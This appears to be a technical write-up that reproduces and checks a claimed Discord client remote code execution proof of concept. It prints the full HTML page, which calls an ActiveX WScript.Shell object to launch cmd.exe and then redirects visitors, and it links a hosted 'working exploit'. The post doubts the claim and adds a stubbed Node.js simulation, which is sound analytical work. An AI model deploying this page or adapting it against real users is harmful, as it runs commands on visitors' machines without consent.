Discord Remote Code Execution Vulnerability: Technical Analysis and Verification

This post reproduces the publicly posted proof of concept for a claimed remote code execution vulnerability in the Discord client on Windows, including the full PoC code, the described exploitation principle and the implementation details, which come down to an ActiveX object call and a payload validation step.

Discord Remote Code Execution Vulnerability Verification

Vulnerability overview

According to the author, the vulnerability targets the Discord client on the Windows platform and allows remote code execution; the author further claims it can force the application to start and execute code even when it is not running. Note what the PoC below actually relies on: ActiveXObject, which only Internet Explorer (and Edge in IE mode with ActiveX permitted) exposes. In Chromium-based browsers and in Discord's own Electron client, window.ActiveXObject is undefined, so the command execution step of the PoC does not run there.

Technical details

Proof-of-concept video

https://www.youtube.com/watch?v=dEGhIpIvBA0

Working exploit link (Windows only)

https://SleepTheGod.github.io/discord_rce.html

Source code repository

https://github.com/SleepTheGod/Discord-RCE

PoC code

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Redirecting...</title>
    <script>
        // Read one query-string parameter, e.g. ?payload=openCmd
        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
        }

        // Payload validation: only letters, digits, underscore and hyphen are
        // accepted; spaces, quotes and shell metacharacters are rejected.
        function isValidPayload(payload) {
            const regex = /^[a-zA-Z0-9_-]+$/;
            return regex.test(payload);
        }

        // ActiveXObject exists only in Internet Explorer (and IE mode). In any
        // other browser the constructor is undefined and the call throws,
        // which lands in the catch block below.
        function openCmd() {
            try {
                var shell = new ActiveXObject("WScript.Shell");
                shell.run("cmd.exe");
            } catch (e) {
                alert("This action is not supported in this browser or is blocked for security reasons.");
            }
        }

        // A single load handler: the warning, the payload check, the optional
        // ActiveX call and the delayed redirect all live here.
        window.onload = function() {
            // alert() blocks until the visitor clicks OK.
            alert("LOL YOU SURE YOU KNOW WHAT YOU ARE DOING HERE CLICK OK TO POP DISCORD");

            const payload = getQueryParam('payload');
            let targetUrl = 'https://discord.com/handoff';

            if (payload && isValidPayload(payload)) {
                targetUrl += `?payload=${encodeURIComponent(payload)}`;
                // Only the literal payload "openCmd" triggers execution, and
                // only when the browser exposes ActiveXObject.
                if (payload === 'openCmd' && window.ActiveXObject) {
                    openCmd();
                }
            }

            // Keep the manual fallback link in sync with the computed target.
            document.getElementById('redirectLink').href = targetUrl;

            // Automatic redirect after a 3-second delay.
            setTimeout(function() {
                window.location.href = targetUrl;
            }, 3000);
        };
    </script>
</head>
<body>
    <p>If you are not redirected automatically, <a id="redirectLink" href="https://discord.com/handoff">click here</a>.</p>
</body>
</html>

Key points

  1. Exploit mechanism: the page redirects the visitor to Discord's handoff endpoint with the payload in the query string (https://discord.com/handoff?payload=...). The command execution itself does not come from that endpoint; it comes from the ActiveX call, which fires only when the payload is exactly the string openCmd.
  2. Platform limitation: Windows only, and in practice only a browser that exposes ActiveXObject (Internet Explorer, or Edge in IE mode with ActiveX permitted). Chromium-based browsers and Discord's Electron client have no window.ActiveXObject, so the openCmd() branch is skipped there.
  3. Execution method: new ActiveXObject("WScript.Shell") followed by shell.run("cmd.exe"), which starts a command prompt as the logged-in user.
  4. Payload validation: the regex /^[a-zA-Z0-9_-]+$/ restricts the payload to letters, digits, underscore and hyphen, so spaces, quotes and shell metacharacters never reach the redirect URL; the only value that triggers execution is the literal openCmd.
  5. Automatic trigger: after a 3-second delay the page navigates to the target URL.

The PoC combines front-end JavaScript, an ActiveX component call and a URL redirect. The step that executes code is the ActiveX call; the page shows nothing about what the handoff endpoint does with the payload parameter, so the claim that code runs through Discord itself rests on the video and the author's description rather than on the code shown here.
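To make the gating described above concrete, the following is an added example (not code from the original post or from the SleepTheGod repository) that reimplements the PoC's decision logic as pure functions runnable under Node.js. The ActiveX factory is injected so that a stub can stand in for Internet Explorer's ActiveXObject; the stub's run() method, the attacker host example.test and the function names are assumptions of this example. It shows that in a browser without ActiveXObject the page only redirects, that the regex rejects metacharacter payloads, and that only the literal payload openCmd reaches shell.run("cmd.exe") when ActiveX is present.

```javascript
'use strict';

// Constants taken from the PoC page.
const HANDOFF_BASE = 'https://discord.com/handoff';
const PAYLOAD_RE = /^[a-zA-Z0-9_-]+$/;

// Same validation rule as the PoC: letters, digits, underscore, hyphen.
function isValidPayload(payload) {
  return typeof payload === 'string' && PAYLOAD_RE.test(payload);
}

// Extract ?payload= from a full URL instead of window.location.search.
function getPayloadFromUrl(url) {
  return new URL(url).searchParams.get('payload');
}

// Run the PoC's decision logic for one visit.
// env.ActiveXObject is either a constructor (IE) or undefined (everything else).
// Returns the redirect target and the command that was handed to the shell, if any.
function simulateVisit(url, env) {
  const payload = getPayloadFromUrl(url);
  const result = { targetUrl: HANDOFF_BASE, executed: null, error: null };

  if (payload && isValidPayload(payload)) {
    result.targetUrl += `?payload=${encodeURIComponent(payload)}`;
    // Mirrors: if (payload === 'openCmd' && window.ActiveXObject) openCmd();
    if (payload === 'openCmd' && env.ActiveXObject) {
      try {
        const shell = new env.ActiveXObject('WScript.Shell');
        result.executed = shell.run('cmd.exe');
      } catch (e) {
        result.error = String(e);
      }
    }
  }
  return result;
}

// Assumed stub standing in for IE's ActiveXObject: it records the command
// instead of spawning a process, and rejects any ProgID other than WScript.Shell.
function makeActiveXStub(log) {
  return function ActiveXObject(progId) {
    if (progId !== 'WScript.Shell') {
      throw new Error('unknown ProgID ' + progId);
    }
    return {
      run(cmd) {
        log.push(cmd);
        return cmd;
      }
    };
  };
}

// Constructed sample URLs (example.test is a placeholder attacker host).
const ATTACK_URL = 'https://example.test/discord_rce.html?payload=openCmd';
const META_URL = 'https://example.test/discord_rce.html?payload=cmd%20/c%20calc';

// Exercise the three interesting cases and return the outcomes.
function demo() {
  const modernEnv = {};                 // Chromium / Electron: no ActiveXObject
  const ieLog = [];
  const ieEnv = { ActiveXObject: makeActiveXStub(ieLog) };
  return {
    modern: simulateVisit(ATTACK_URL, modernEnv),
    ie: simulateVisit(ATTACK_URL, ieEnv),
    ieLog,
    metachars: simulateVisit(META_URL, modernEnv)
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The modern case ends with a redirect to https://discord.com/handoff?payload=openCmd and nothing executed; the IE stub case records a single "cmd.exe"; the metacharacter payload fails validation and the redirect target stays the bare handoff URL.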
